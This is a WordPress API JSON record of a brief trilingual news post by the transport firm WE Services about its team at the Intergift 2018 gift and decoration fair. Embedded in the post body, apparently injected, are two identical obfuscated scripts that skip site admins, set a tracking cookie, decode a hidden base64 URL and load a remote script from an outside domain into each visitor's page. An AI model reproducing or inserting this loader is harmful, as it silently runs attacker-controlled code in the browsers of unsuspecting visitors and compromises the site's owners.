{"id":1272,"date":"2018-02-26T09:53:44","date_gmt":"2018-02-26T07:53:44","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1272"},"modified":"2026-04-27T10:16:16","modified_gmt":"2026-04-27T10:16:16","slug":"intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/","title":{"rendered":"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:]"},"content":{"rendered":"<p>[:es]WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.[:en]<span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">WE Services counted for the first time with a specific team work in the flagship event of the gift and decoration sector in Spain.<\/span><\/span>[:ca]<span id=\"result_box\" class=\"\" lang=\"ca\">WE Services <span class=\"\">va comptar<\/span> per primera vegada amb un equip de treball espec\u00edfic en l&#8217;esdeveniment ins\u00edgnia <span class=\"\">del sector<\/span> del regal <span class=\"\">a Espanya.<\/span><\/span>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.[:en]WE Services counted for the first time with a specific team work in the flagship event of the gift and decoration sector in Spain.[:ca]WE Services va comptar per primera vegada amb un equip de [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1274,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services<\/title>\n<meta name=\"description\" content=\"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2018-02-26T07:53:44+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:16:16+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/\",\"url\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/\",\"name\":\"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2018-02-26T07:53:44+00:00\",\"dateModified\":\"2026-04-27T10:16:16+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services","description":"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/","og_locale":"en_US","og_type":"article","og_title":"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services","og_description":"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the","og_url":"https:\/\/weservices.es\/en\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/","og_site_name":"We Services","article_published_time":"2018-02-26T07:53:44+00:00","article_modified_time":"2026-04-27T10:16:16+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/","url":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/","name":"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage"},"thumbnailUrl":"","datePublished":"2018-02-26T07:53:44+00:00","dateModified":"2026-04-27T10:16:16+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"WE Services cont\u00f3 por primera vez con un equipo de trabajo espec\u00edfico en el evento insignia del sector del regalo en Espa\u00f1a.WE Services counted for the","breadcrumb":{"@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/intergift-2018-el-mercado-nacional-en-el-sector-del-regalo-y-la-decoracion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]INTERGIFT 2018, EL MERCADO NACIONAL EN EL SECTOR DEL REGALO Y LA DECORACI\u00d3N[:en]INTERGIFT 2018, THE SPANISH NATIONAL MARKET IN GIFT AND DECORATION[:ca]INTERGIFT 2018, EL MERCAT NACIONAL AL SECTOR DEL REGAL I LA DECORACI\u00d3[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1272"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1272"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1272\/revisions"}],"predecessor-version":[{"id":3160,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1272\/revisions\/3160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1272"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}